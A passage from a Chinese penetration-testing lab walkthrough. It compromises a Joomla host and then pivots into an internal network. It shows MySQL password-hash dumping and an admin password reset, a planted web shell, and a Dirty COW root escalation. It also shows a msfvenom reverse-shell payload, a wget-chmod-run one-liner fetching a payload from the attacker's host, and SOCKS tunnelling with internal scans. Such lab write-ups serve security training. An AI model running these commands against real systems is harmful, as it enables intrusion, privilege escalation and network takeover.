[+] Detecting Joomla Version
[++] Joomla 3.9.12
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.1.21/administrator/components
http://192.168.1.21/administrator/modules
http://192.168.1.21/administrator/templates
http://192.168.1.21/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.1.21/administrator/
[+] Checking robots.txt existing
[++] robots.txt is found
path : http://192.168.1.21/robots.txt
Interesting path found from robots.txt
http://192.168.1.21/joomla/administrator/
http://192.168.1.21/administrator/
http://192.168.1.21/bin/
http://192.168.1.21/cache/
http://192.168.1.21/cli/
http://192.168.1.21/components/
http://192.168.1.21/includes/
http://192.168.1.21/installation/
http://192.168.1.21/language/
http://192.168.1.21/layouts/
http://192.168.1.21/libraries/
http://192.168.1.21/logs/
http://192.168.1.21/modules/
http://192.168.1.21/plugins/
http://192.168.1.21/tmp/
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config file is found
config file path : http://192.168.1.21/configuration.php~
Your Report : reports/192.168.1.21/
看来行不通,那么现在我们只能远程登录到靶机的MySQL中。
MySQL
1、远程登录
┌──(root㉿ru)-[~]
└─# mysql -u testuser -h 192.168.1.21 -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 4306
Server version: 5.7.27-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
+--------------------+
2 rows in set (0.001 sec)
2、查看敏感数据
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
+--------------------+
2 rows in set (0.001 sec)
MySQL [(none)]> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
| am2zu_action_log_config |
| am2zu_action_logs |
| am2zu_action_logs_extensions |
| am2zu_action_logs_users |
| am2zu_assets |
| am2zu_associations |
| am2zu_banner_clients |
| am2zu_banner_tracks |
| am2zu_banners |
| am2zu_categories |
| am2zu_contact_details |
| am2zu_content |
| am2zu_content_frontpage |
| am2zu_content_rating |
| am2zu_content_types |
| am2zu_contentitem_tag_map |
| am2zu_core_log_searches |
| am2zu_extensions |
| am2zu_fields |
| am2zu_fields_categories |
| am2zu_fields_groups |
| am2zu_fields_values |
| am2zu_finder_filters |
| am2zu_finder_links |
| am2zu_finder_links_terms0 |
| am2zu_finder_links_terms1 |
| am2zu_finder_links_terms2 |
| am2zu_finder_links_terms3 |
| am2zu_finder_links_terms4 |
| am2zu_finder_links_terms5 |
| am2zu_finder_links_terms6 |
| am2zu_finder_links_terms7 |
| am2zu_finder_links_terms8 |
| am2zu_finder_links_terms9 |
| am2zu_finder_links_termsa |
| am2zu_finder_links_termsb |
| am2zu_finder_links_termsc |
| am2zu_finder_links_termsd |
| am2zu_finder_links_termse |
| am2zu_finder_links_termsf |
| am2zu_finder_taxonomy |
| am2zu_finder_taxonomy_map |
| am2zu_finder_terms |
| am2zu_finder_terms_common |
| am2zu_finder_tokens |
| am2zu_finder_tokens_aggregate |
| am2zu_finder_types |
| am2zu_languages |
| am2zu_menu |
| am2zu_menu_types |
| am2zu_messages |
| am2zu_messages_cfg |
| am2zu_modules |
| am2zu_modules_menu |
| am2zu_newsfeeds |
| am2zu_overrider |
| am2zu_postinstall_messages |
| am2zu_privacy_consents |
| am2zu_privacy_requests |
| am2zu_redirect_links |
| am2zu_schemas |
| am2zu_session |
| am2zu_tags |
| am2zu_template_styles |
| am2zu_ucm_base |
| am2zu_ucm_content |
| am2zu_ucm_history |
| am2zu_update_sites |
| am2zu_update_sites_extensions |
| am2zu_updates |
| am2zu_user_keys |
| am2zu_user_notes |
| am2zu_user_profiles |
| am2zu_user_usergroup_map |
| am2zu_usergroups |
| am2zu_users |
| am2zu_utf8_conversion |
| am2zu_viewlevels |
| umnbt_action_log_config |
| umnbt_action_logs |
| umnbt_action_logs_extensions |
| umnbt_action_logs_users |
| umnbt_assets |
| umnbt_associations |
| umnbt_banner_clients |
| umnbt_banner_tracks |
| umnbt_banners |
| umnbt_categories |
| umnbt_contact_details |
| umnbt_content |
| umnbt_content_frontpage |
| umnbt_content_rating |
| umnbt_content_types |
| umnbt_contentitem_tag_map |
| umnbt_core_log_searches |
| umnbt_extensions |
| umnbt_fields |
| umnbt_fields_categories |
| umnbt_fields_groups |
| umnbt_fields_values |
| umnbt_finder_filters |
| umnbt_finder_links |
| umnbt_finder_links_terms0 |
| umnbt_finder_links_terms1 |
| umnbt_finder_links_terms2 |
| umnbt_finder_links_terms3 |
| umnbt_finder_links_terms4 |
| umnbt_finder_links_terms5 |
| umnbt_finder_links_terms6 |
| umnbt_finder_links_terms7 |
| umnbt_finder_links_terms8 |
| umnbt_finder_links_terms9 |
| umnbt_finder_links_termsa |
| umnbt_finder_links_termsb |
| umnbt_finder_links_termsc |
| umnbt_finder_links_termsd |
| umnbt_finder_links_termse |
| umnbt_finder_links_termsf |
| umnbt_finder_taxonomy |
| umnbt_finder_taxonomy_map |
| umnbt_finder_terms |
| umnbt_finder_terms_common |
| umnbt_finder_tokens |
| umnbt_finder_tokens_aggregate |
| umnbt_finder_types |
| umnbt_languages |
| umnbt_menu |
| umnbt_menu_types |
| umnbt_messages |
| umnbt_messages_cfg |
| umnbt_modules |
| umnbt_modules_menu |
| umnbt_newsfeeds |
| umnbt_overrider |
| umnbt_postinstall_messages |
| umnbt_privacy_consents |
| umnbt_privacy_requests |
| umnbt_redirect_links |
| umnbt_schemas |
| umnbt_session |
| umnbt_tags |
| umnbt_template_styles |
| umnbt_ucm_base |
| umnbt_ucm_content |
| umnbt_ucm_history |
| umnbt_update_sites |
| umnbt_update_sites_extensions |
| umnbt_updates |
| umnbt_user_keys |
| umnbt_user_notes |
| umnbt_user_profiles |
| umnbt_user_usergroup_map |
| umnbt_usergroups |
| umnbt_users |
| umnbt_utf8_conversion |
| umnbt_viewlevels |
+-------------------------------+
156 rows in set (0.001 sec)
MySQL [joomla]>
MySQL [joomla]> select username,0x3a,password from umnbt_users;
+----------+------+--------------------------------------------------------------+
| username | 0x3a | password |
+----------+------+--------------------------------------------------------------+
| admin | : | $2y$10$N/Yv/9rzxyq.z0gLTT5og.pj3FFAP8Sq2PcBgsMX/Qnc2671qQkHy |
+----------+------+--------------------------------------------------------------+
1 row in set (0.001 sec)
MySQL [joomla]> select username,0x3a,password from am2zu_users;
+---------------+------+--------------------------------------------------------------+
| username | 0x3a | password |
+---------------+------+--------------------------------------------------------------+
| administrator | : | $2y$10$.Bke7JJThQfzjwpTlilxx.aCg7CmSYbz358LeqjZZhLDak/vv7EDy |
+---------------+------+--------------------------------------------------------------+
1 row in set (0.001 sec)
使用mysql命令进行修改
update am2zu_users set password = md5("root") where id = 891;
在这两个账号的前面有一个super user 的标注。说明这两个账号很可能具有最高权限,我们直接修改administrator 账号的密码为root,当然root一定要加密为MD5值。
登录后台
1、成功登录
全部登录上去,都是用adminstrator用户。
2、RCE漏洞
https://www.cnblogs.com/starci/p/15174896.htmlhttps://www.cnblogs.com/starci/p/15174896.html
点击“option”,修改Path to Files Folder路径为当前路径“./”
可以看到这里可以操作整个web目录下的文件夹及文件,实现了目录遍历。
在这我们通过修改文件进行命令执行。我们尝试另外一种方式。
蚁剑连接
1、写入shell
根据资料收集,默认的执行路径是 http://localhost/templates/beez3/*.php
我们只需要在这里面写入木马即可。
路径就是这样,我们利用后台有的php代码文件进行插入木马。
GitHub - HoangKien1020/CVE-2021-23132: com_media allowed paths that are not intended for image uploads to RCEcom_media allowed paths that are not intended for image uploads to RCE - GitHub - HoangKien1020/CVE-2021-23132: com_media allowed paths that are not intended for image uploads to RCEhttps://github.com/HoangKien1020/CVE-2021-23132
测试成功,接下来就可以进行写马了。
2、disable_functions函数绕过
在蚁剑上使用命令,发现不能使用,经过排查,发现禁用了很多参数。那么只能采用绕过的方式了。可以在github上搜索相应的exp,也可以使用蚁剑的插件,进行 disable_functions 绕过。
GitHub - l3m0n/Bypass_Disable_functions_Shell: 一个各种方式突破Disable_functions达到命令执行的shell一个各种方式突破Disable_functions达到命令执行的shell. Contribute to l3m0n/Bypass_Disable_functions_Shell development by creating an account on GitHub.https://github.com/l3m0n/Bypass_Disable_functions_Shell
上下两个都可以试试。
(www-data:/etc) $ netstat -anlpt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 192.168.93.120:80 192.168.93.100:44095 ESTABLISHED -
tcp6 0 0 192.168.93.120:80 192.168.93.100:44093 TIME_WAIT -
tcp6 0 0 192.168.93.120:80 192.168.93.100:44094 TIME_WAIT -
我们看到的ip是192.168.93.120,而不是192.168.1.21,说明这里存在一个反向代理,把我们的流量代理到了192.168.93.120这个IP上。现在我们需要去拿下外网主机。说明是IP为192.168.93.100为外网转发流量主机。
我们在tmp目录下找到了test.txt文件。获得了账号以及密码。
adduser wwwuser
passwd wwwuser_123Aqx
SSH连接
┌──(root㉿ru)-[~/lianxi]
└─# ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss wwwuser@192.168.1.21
The authenticity of host '192.168.1.21 (192.168.1.21)' can't be established.
RSA key fingerprint is SHA256:pVIGFsCgpYpKxtt43DtcC9NUBpUvyNCfIitNR9UsPRA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.21' (RSA) to the list of known hosts.
wwwuser@192.168.1.21's password:
Last login: Sun Oct 6 20:24:43 2019 from 192.168.1.122
[wwwuser@localhost ~]$ ls
[wwwuser@localhost ~]$ id
uid=500(wwwuser) gid=500(wwwuser) 组=500(wwwuser) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[wwwuser@localhost ~]$
[wwwuser@localhost ~]$ uname -a
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
[wwwuser@localhost ~]$ find / -perm -u=s f 2>/dev/null
[wwwuser@localhost ~]$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/fusermount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/crontab
/usr/bin/sudo
/usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/sbin/pam_timestamp_check
/sbin/unix_chkpwd
[wwwuser@localhost ~]$
脏牛提权复现以及如何得到一个完全交互的shell - 先知社区先知社区,先知安全技术社区https://xz.aliyun.com/t/9757
经过探索,发现主机可以进行内核提权,而且主机的内核在脏牛漏洞的影响范围内。
提权
┌──(root㉿ru)-[~/tools/loudong/zangniu]
└─# php -S 0:8080
[Sat Dec 2 17:53:11 2023] PHP 8.2.7 Development Server (http://0:8080) started
[wwwuser@localhost tmp]$ wget http://192.168.1.20:8080/dirty.c
--2019-10-07 10:12:15-- http://192.168.1.20:8080/dirty.c
正在连接 192.168.1.20:8080... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:4815 (4.7K) [text/x-c]
正在保存至: “dirty.c”
100%[======================================>] 4,815 --.-K/s in 0s
2019-10-07 10:12:15 (21.0 MB/s) - 已保存 “dirty.c” [4815/4815])
[wwwuser@localhost tmp]$ ls
dirty.c passwd.bak yum.log
[wwwuser@localhost tmp]$ chmod +x dirty.c
[wwwuser@localhost tmp]$
[wwwuser@localhost tmp]$ gcc -pthread dirty.c -o dirty -lcrypt
[wwwuser@localhost tmp]$ ls
dirty dirty.c passwd.bak yum.log
[wwwuser@localhost tmp]$ ./dirty
File /tmp/passwd.bak already exists! Please delete it and run again
[wwwuser@localhost tmp]$ cd /home
[wwwuser@localhost home]$ ls
wwwuser
[wwwuser@localhost home]$ cd wwwuser
[wwwuser@localhost ~]$ ls
[wwwuser@localhost ~]$ cp /tmp/passwd.bak .
[wwwuser@localhost ~]$ ls
passwd.bak
[wwwuser@localhost home]$ cd /tmp
[wwwuser@localhost tmp]$ ls
dirty dirty.c passwd.bak yum.log
[wwwuser@localhost tmp]$ rm passwd.bak
[wwwuser@localhost tmp]$ clear
[wwwuser@localhost tmp]$ ls
dirty dirty.c yum.log
[wwwuser@localhost tmp]$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: (ls)
Complete line:
firefart:fiUtQRmTKI0Ek:0:0:pwned:/root:/bin/bash
mmap: 7f18ff557000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'ls'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
[wwwuser@localhost tmp]$
[wwwuser@localhost tmp]$ ls
dirty dirty.c passwd.bak yum.log
[wwwuser@localhost tmp]$
┌──(root㉿ru)-[~/tools/loudong/zangniu]
└─# ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss firefart@192.168.1.21
firefart@192.168.1.21's password:
Last login: Sun Oct 6 20:25:55 2019 from 192.168.1.122
[firefart@localhost ~]# whoami
firefart
[firefart@localhost ~]# cd /root
[firefart@localhost ~]# ls
anaconda-ks.cfg install.log install.log.syslog nginx-1.9.4 nginx-1.9.4.tar.gz
[firefart@localhost ~]# id
uid=0(firefart) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[firefart@localhost ~]#
至此外网打点结束,成功利用脏牛提权。那么下一步只需要进行横向渗透即可。
内网渗透
横向渗透1
1、生成木马文件
msfvenom -p linux/x64/meterpreter/reverse_tcp lhosts=192.168.1.25 lport=1111 SessionCommunication Timeout=0 SessionExpiration Timeout=0 -f elf -o shell.elf
使用msfvenom来生成一个 Linux x64 平台上的 Meterpreter 反向 shell。
然后生成的反向 shell 的配置是将 Meterpreter shell 连接到本地 IP 地址为 192.168.1.25,端口为 1111 的目标主机上。
此外,还设置了会话的通信超时和过期超时时间都为 0,这意味着会话将一直保持存活,直到它们被显式终止。
-p : 指定payload
lhosts=192.168.1.25 lport=1111 : 指定监听主机
SessionCommunication Timeout=0 : 指定会话的通信超时为0
SessionExpiration Timeout=0 : 指定会话的过期超时时间为0
-f elf : 指定文件得类型
-o shell.elf : 指定输出为shell.elf
2、开启监听
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
lhosts => 192.168.1.25
msf6 exploit(multi/handler) > set lhost 192.168.1.25
lhost => 192.168.1.25
msf6 exploit(multi/handler) > set lport 1111
lport => 1111
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.25 yes The listen address (an interface may be specified)
LPORT 1111 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
[firefart@localhost tmp]# wget http://192.168.1.25/shell.elf
--2019-10-07 11:03:06-- http://192.168.1.25/shell.elf
正在连接 192.168.1.25:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:250 [application/octet-stream]
正在保存至: “shell.elf”
100%[======================================>] 250 --.-K/s in 0s
2019-10-07 11:03:06 (46.8 MB/s) - 已保存 “shell.elf” [250/250])
[firefart@localhost tmp]# ls
dirty dirty.c passwd.bak shell.elf yum.log
[firefart@localhost tmp]# chmod +x shell.elf
[firefart@localhost tmp]# ./shell.elf
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.25:1111
[*] Sending stage (3045348 bytes) to 192.168.1.21
[*] Meterpreter session 1 opened (192.168.1.25:1111 -> 192.168.1.21:36214) at 2023-12-03 09:17:39 +0800
meterpreter > getuid
Server username: firefart
3、添加内网路由
查看内网路由
meterpreter > run get_local_subnets //查看子网范围
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
Local subnet: 192.168.93.0/255.255.255.0
meterpreter > run autoroute -s 192.168.93.0/24 //添加内网路由
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.93.0/255.255.255.0...
[+] Added route to 192.168.93.0/255.255.255.0 via 192.168.1.21
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p //查看当前meterpreter的路由表
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.93.0 255.255.255.0 Session 1
横向渗透2
1、建立监听
use exploit(multi/script/web_delivery
......
msf6 exploit(multi/script/web_delivery) > set lport 4444
lport => 4444
msf6 exploit(multi/script/web_delivery) > set SRVPORT 80
SRVPORT => 80
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.25:4444
[*] Using URL: http://192.168.1.25/0796Iv35A4
msf6 exploit(multi/script/web_delivery) > [*] Server started.
[*] Run the following command on the target machine:
wget -qO msAjJhyl --no-check-certificate http://192.168.1.25/0796Iv35A4; chmod +x msAjJhyl; ./msAjJhyl& disown
[*] 192.168.1.21 web_delivery - Delivering Payload (250 bytes)
[*] Sending stage (3045348 bytes) to 192.168.1.21
[*] Meterpreter session 4 opened (192.168.1.25:4444 -> 192.168.1.21:41080) at 2023-12-04 08:26:03 +0800
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
4 meterpreter x64/linux firefart @ localhost.localdomain 192.168.1.25:4444 -> 192.168.1.21:41080 (192.168.1.21)
Module options (exploit/multi/script/web_delivery):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.25 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
7 Linux
View the full module info with the info, or info -d command.
msf6 exploit(multi/script/web_delivery) >
[firefart@localhost tmp]# wget -qO msAjJhyl --no-check-certificate http://192.168.1.25/0796Iv35A4; chmod +x msAjJhyl; ./msAjJhyl& disown
[1] 12342
2、进入meterpreter
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
4 meterpreter x64/linux firefart @ localhost.localdomain 192.168.1.25:4444 -> 192.168.1.21:41080 (192.168.1.21)
msf6 exploit(multi/script/web_delivery) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > getuid
Server username: firefart
meterpreter >
3、添加内网路由
meterpreter > background
[*] Backgrounding session 4...
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
4 meterpreter x64/linu firefart @ localhost. 192.168.1.25:4444 ->
x localdomain 192.168.1.21:41080 (1
92.168.1.21)
msf6 exploit(multi/script/web_delivery) >
msf6 exploit(multi/script/web_delivery) > route add 192.168.93.0 255.255.255.0 4[*] Route already exists
msf6 exploit(multi/script/web_delivery) >
# 目的网段 192.168.93.0 子网掩码 255.255.255.0 下一跳地址 session 4
4、socks5代理
上述的内网渗透,建立监听操作都是在msfconsole视图下完成的,路由转发只能将msfconsole带进内网,但是想要将攻击机其他程序也带进内网还需要搭建socks代理。
使用earthworm搭建socks5反向代理
1、earthworm内网穿透工具
./ew_for_linux64 -s rcsocks -l 9898 -e 6767
#将9898端口监听到的本地数据转发到 web服务器的6767端口
# 通过9898端口,将本地流量转发出去
#rcsocks、rssocks 用于反向连接
#ssocks 用于正向连接
# -l 指定本地监听的端口
# -e 指定要反弹到的机器端口
# -d 指定要反弹到机器的IP
# -f 指定要主动连接的机器 ip
# -g 指定要主动连接的机器端口
# -t 指定超时时长,默认为 1000
^C[firefart@localhost tmp]# ls
dirty dirty.c passwd.bak shell.elf yum.log
[firefart@localhost tmp]# wget http://192.168.1.25:8080/ew_for_linux64
--2019-10-07 13:22:27-- http://192.168.1.25:8080/ew_for_linux64
正在连接 192.168.1.25:8080... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:28080 (27K) [application/octet-stream]
正在保存至: “ew_for_linux64”
100%[================================================================================================================================================================================================================>] 28,080 --.-K/s in 0.001s
2019-10-07 13:22:27 (34.7 MB/s) - 已保存 “ew_for_linux64” [28080/28080])
[firefart@localhost tmp]# ls
dirty dirty.c ew_for_linux64 passwd.bak shell.elf yum.log
[firefart@localhost tmp]# chmod +x ew_for_linux64
[firefart@localhost tmp]# ls
dirty dirty.c ew_for_linux64 passwd.bak shell.elf yum.log
[firefart@localhost tmp]#
┌──(root㉿ru)-[~/…/neiwang/EarthWorm/download/products]
└─# ./ew_for_linux64 -s rcsocks -l 9898 -e 6767
rcsocks 0.0.0.0:5656 <--[10000 usec]--> 0.0.0.0:6767
init cmd_server_for_rc here
start listen port here
rssocks cmd_socket OK!
[firefart@localhost tmp]# ./ew_for_linux64 -s rssocks -d 192.168.1.25 -e 6767
rssocks 192.168.1.25:6767 <--[10000 usec]--> socks server
2、配置proxychains4.conf文件
┌──(root㉿ru)-[~/lianxi]
└─# cat /etc/proxychains4.conf | grep "socks5"
# socks5 192.168.67.78 1080 lamer secret
# proxy types: http, socks4, socks5, raw
#socks5 127.0.0.1 2222
#socks5 116.211.207.100 8080
socks5 127.0.0.1 9898
将socks5服务器指向9898端口,然后端口有9898把本地流量转发到6767端口,然后6767端口就会把我们本地流量带到内网中,之后我们就可以利用proxychains将我们的程序代理进入内网了
5、内网主机发现
1、第一种模块
msf6 exploit(multi/script/web_delivery) > use auxiliary/scanner/discovery/udp_probe
msf6 auxiliary(scanner/discovery/udp_probe) > show options
Module options (auxiliary/scanner/discovery/udp_probe):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/discovery/udp_probe) > set rhost 192.168.93.0-255
rhost => 192.168.93.0-255
msf6 auxiliary(scanner/discovery/udp_probe) > set THREADS 5
THREADS => 5
msf6 auxiliary(scanner/discovery/udp_probe) >
msf6 auxiliary(scanner/discovery/udp_probe) > run
[-] Unknown error: 192.168.93.0:5632 Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1 ["/usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb:38:in `open'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:143:in `create_udp_channel'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:96:in `create'", "/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket.rb:51:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:39:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:30:in `create'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:76:in `block in run_host'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `each'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'"]
[+] Discovered DNS on 192.168.93.10:53 (Microsoft DNS)
[+] Discovered NetBIOS on 192.168.93.10:137 (WIN-8GA56TNV3MV:<00>:U :TEST:<00>:G :TEST:<1c>:G :WIN-8GA56TNV3MV:<20>:U :TEST:<1b>:U :00:0c:29:1f:54:d2)
[+] Discovered NTP on 192.168.93.10:123 (1c0104fa00000000000a16634c4f434ce9179267a83fa2adc54f234b71b152f3e917aaa60c16aceae917aaa60c16acea)
[+] Discovered NetBIOS on 192.168.93.20:137 (WIN2008:<00>:U :TEST:<00>:G :WIN2008:<20>:U :00:0c:29:ab:44:ec)
[+] Discovered MSSQL on 192.168.93.20:1434 (ServerName=WIN2008 InstanceName=MSSQLSERVER IsClustered=No Version=10.0.1600.22 tcp=1433 )
[*] Scanned 26 of 256 hosts (10% complete)
[+] Discovered NetBIOS on 192.168.93.30:137 (WIN7:<20>:U :WIN7:<00>:U :TEST:<00>:G :TEST:<1e>:G :TEST:<1d>:U :__MSBROWSE__:<01>:G :00:0c:29:e0:74:2b)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[-] Unknown error: 192.168.93.255:5632 Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1 ["/usr/share/metasploit-framework/lib/rex/post/meterpreter/channel.rb:116:in `create'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb:38:in `open'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:143:in `create_udp_channel'", "/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb:96:in `create'", "/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:587:in `create'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket.rb:51:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:39:in `create_param'", "/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/rex-socket-0.1.52/lib/rex/socket/udp.rb:30:in `create'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:76:in `block in run_host'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `each'", "/usr/share/metasploit-framework/modules/auxiliary/scanner/discovery/udp_probe.rb:66:in `run_host'", "/usr/share/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:124:in `block (2 levels) in run'", "/usr/share/metasploit-framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'"]
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
扫描到三台内网主机
192.168.93.10
192.168.93.20
192.168.93.30
2、第二种模块
msf6 auxiliary(scanner/discovery/udp_probe) > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
THREADS 1 yes The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.93.0-255
rhosts => 192.168.93.0-255
msf6 auxiliary(scanner/smb/smb_version) > set THREADS 5
THREADS => 5
msf6 auxiliary(scanner/smb/smb_version) > run
[-] 192.168.93.0:445 - 192.168.93.0: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.0:139 - 192.168.93.0: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.1:445 - 192.168.93.1: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] 192.168.93.2:445 - 192.168.93.2: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
